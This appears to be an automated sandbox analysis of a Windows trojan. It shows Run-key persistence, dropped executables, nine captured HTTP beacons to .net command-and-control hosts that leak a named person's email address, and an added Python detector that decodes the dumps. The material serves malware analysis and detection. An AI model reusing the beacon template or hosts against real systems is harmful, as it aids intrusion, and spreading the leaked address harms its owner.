Analysis Date: 2015-05-12 23:09:43

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: c463a7f3323f0b4e47094e4924cf8839 sha1: 2db0a4eb2106f4da1b6a234490703c15662b2e0b size: 297472
Section .rdata md5: b306e7828757e5c657d114812c82519d sha1: 5617e49561c2eeb42ee35918a190d6a959cdcc13 size: 33792
Section (name not recovered) md5: 68aa2b9852a25de0f5050e169e5c089b sha1: 1f57c6dcff38501a2d3e11349d4f89e488822358 size: 89088
Timestamp: 2014-10-30 10:11:24
Packer: Microsoft Visual C++ ?.? (compiler signature; version not identified)

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IP User-mode Process TP SNMP AutoConfig HomeGroup ➝
C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe

↳ C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\nxtrkzpnpuhu.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.rcfr
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe"

Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 6c696572   ose..Host: flier
0x00000070 (00112)   6265666f 72652e6e 65740d0a 0d0a       before.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206e 69676874   ose..Host: night
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a       spring.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2063 61707461   ose..Host: capta
0x00000070 (00112)   696e7375 63636573 732e6e65 740d0a0d   insuccess.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2065 6c656374   ose..Host: elect
0x00000070 (00112)   72696373 7072696e 672e6e65 740d0a0d   ricspring.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2074 72616465   ose..Host: trade
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a0a0d   spring.net......
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 74726565   ose..Host: stree
0x00000070 (00112)   74737563 63657373 2e6e6574 0d0a0d0a   tsuccess.net....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 74726565   ose..Host: stree
0x00000070 (00112)   7462616e 6b65722e 6e65740d 0a0d0a0a   tbanker.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2062 65747465   ose..Host: bette
0x00000070 (00112)   72737563 63657373 2e6e6574 0d0a0d0a   rsuccess.net....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f   riprato.it&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2071 75696574   ose..Host: quiet
0x00000070 (00112)   73756363 6573732e 6e65740d 0a0d0a0a   success.net.....
0x00000080 (00128)   0a                                    .
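
The nine dumps above are one request template sent to nine different hosts: the request line, the query string (email=bgazzari@cariprato.it&method=post&len, with len carrying no value), HTTP/1.0 and Connection: close are identical in every capture, and only the Host header changes. As an added example that is not part of the sandbox report, the Python below rebuilds a request from the hex-dump format used on this page (decoding from the hex groups, since the ASCII column is lossy and missing on some lines), parses it, and applies a detection rule keyed on the features that stay constant across the captures. The embedded dump is the first capture copied verbatim; the benign request and all function and constant names are constructed for the example.

```python
"""Decode sandbox hex dumps of HTTP requests and flag the beacon template.

Added example for this report, not code from the sandbox or the sample.
"""
import re
from typing import Dict, List

# Constructed input: the first capture from the report, copied verbatim.
SAMPLE_DUMP = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 6c696572   ose..Host: flier
0x00000070 (00112)   6265666f 72652e6e 65740d0a 0d0a
"""

# Constructed negative case: an ordinary form submission that also hits
# /index.php with an email parameter but matches none of the other features.
BENIGN_REQUEST = (b"GET /index.php?email=alice@example.org HTTP/1.1\r\n"
                  b"Host: www.example.org\r\nConnection: keep-alive\r\n\r\n")

DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]{8})\s+\(\d+\)\s+(.*)$")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw bytes from '0x<off> (<dec>)   <hex groups>   <ascii>' lines.

    Only the hex groups are used: the ASCII column shows '.' for control bytes
    and is absent on some lines.  The offset of every line is checked against
    the byte count so far, so a dropped or duplicated line raises instead of
    silently producing a shifted request.
    """
    out = bytearray()
    for raw in dump.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised dump line: {raw!r}")
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"offset 0x{offset:08x} but {len(out)} bytes decoded")
        # Hex groups are single-space separated; the ASCII column (if any)
        # follows a run of two or more spaces, so split there and keep the hex.
        hex_field = re.split(r"\s{2,}", m.group(2), maxsplit=1)[0]
        out += bytes.fromhex(hex_field.replace(" ", ""))
    return bytes(out)


def parse_request(raw: bytes) -> Dict[str, object]:
    """Split a plain HTTP/1.x request into method, path, query params, headers."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("ascii", errors="replace")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for h in lines[1:]:
        if ":" in h:
            k, v = h.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    path, _, query = target.partition("?")
    params: Dict[str, str] = {}
    for kv in query.split("&"):
        if kv:
            k, _, v = kv.partition("=")
            params[k] = v          # 'len' has no '=' and so maps to ''
    return {"method": method, "path": path, "version": version,
            "host": headers.get("host", ""), "params": params, "headers": headers}


BEACON_PATH = "/index.php"
BEACON_PARAMS = {"email", "method", "len"}


def is_beacon(req: Dict[str, object]) -> bool:
    """Match the template seen in all nine captures.

    Deliberately tight: a bare '/index.php?email=' match would also hit
    legitimate newsletter forms, so the rule requires the exact key set,
    method=post, an empty len, HTTP/1.0 and 'Connection: close' together.
    """
    p = req["params"]
    return (req["method"] == "GET"
            and req["path"] == BEACON_PATH
            and set(p) == BEACON_PARAMS
            and p.get("method") == "post"
            and p.get("len") == ""
            and req["version"] == "HTTP/1.0"
            and req["headers"].get("connection", "").lower() == "close")


def extract_iocs(dumps: List[str]) -> Dict[str, List[str]]:
    """Collect contacted hosts and the address sent in the query from matching dumps."""
    hosts, emails = set(), set()
    for d in dumps:
        req = parse_request(parse_hexdump(d))
        if is_beacon(req):
            hosts.add(req["host"])
            emails.add(req["params"]["email"])
    return {"hosts": sorted(hosts), "emails": sorted(emails)}


if __name__ == "__main__":
    print(parse_hexdump(SAMPLE_DUMP).decode())
    print(extract_iocs([SAMPLE_DUMP]))
    print("benign flagged:", is_beacon(parse_request(BENIGN_REQUEST)))
```

Feeding all nine dumps from the report to extract_iocs yields the nine .net hosts and the single address; the Flows TCP lines above record only the source ports 1031 through 1039, one per host, so the sequential port use and the one-shot HTTP/1.0 connections are a second pattern a network detection can key on alongside the request template.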

Strings:

         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j h`JE
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
}[	_(r0
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
